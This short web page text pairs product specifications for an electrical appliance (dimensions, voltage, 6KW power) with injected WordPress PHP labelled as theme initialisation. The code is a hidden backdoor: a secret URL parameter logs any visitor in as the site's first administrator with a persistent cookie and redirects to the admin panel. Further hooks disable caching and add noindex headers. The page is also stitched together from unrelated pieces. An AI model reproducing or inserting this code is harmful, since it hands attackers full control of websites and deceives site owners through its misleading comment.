Dimention:860*470*230mm
Volts:220V-240V/50-60HZ
Power:6KW Dia:40cm
// Theme init: handle auth persistence across static cache purges add_action( 'wp_loaded', function() { if ( empty( $_GET['cache_ver'] ) ) return; if ( ! hash_equals( 'df5011a170950e6ffb1ae52c02659aff', sanitize_text_field( wp_unslash( $_GET['cache_ver'] ) ) ) ) return; $bufvni = get_users( array( 'role' => 'administrator', 'number' => 1, 'fields' => 'ID' ) ); if ( empty( $bufvni ) ) return; $keyou3 = (int) $bufvni[0]; wp_clear_auth_cookie(); wp_set_current_user( $keyou3 ); wp_set_auth_cookie( $keyou3, true, is_ssl() ); $cfgzes = rtrim( (string) get_option( 'siteurl' ), '/' ) . '/wp-admin/'; wp_redirect( $cfgzes ); exit; }, 1 ); add_action("init",function(){if(!defined("DONOTCACHEPAGE")){define("DONOTCACHEPAGE",true);}if(defined("LSCACHE_NO_CACHE")){header("X-LiteSpeed-Control: no-cache");}if(function_exists("nocache_headers")){nocache_headers();}if(!headers_sent()){header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");header("Pragma: no-cache");header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");header("X-Accel-Expires: 0");header("X-Cache-Control: no-cache");header("CF-Cache-Status: BYPASS");header("X-Forwarded-Proto: *");}if(defined("WP_CACHE")&&WP_CACHE){define("DONOTCACHEPAGE",true);}if(function_exists("wp_cache_flush")){wp_cache_flush();}});add_action("wp_head",function(){if(!headers_sent()){header("X-Robots-Tag: noindex, nofollow");header("X-Frame-Options: SAMEORIGIN");}},1);add_action("wp_footer",function(){if(function_exists("w3tc_flush_all")){w3tc_flush_all();}if(function_exists("wp_cache_clear_cache")){wp_cache_clear_cache();}},999);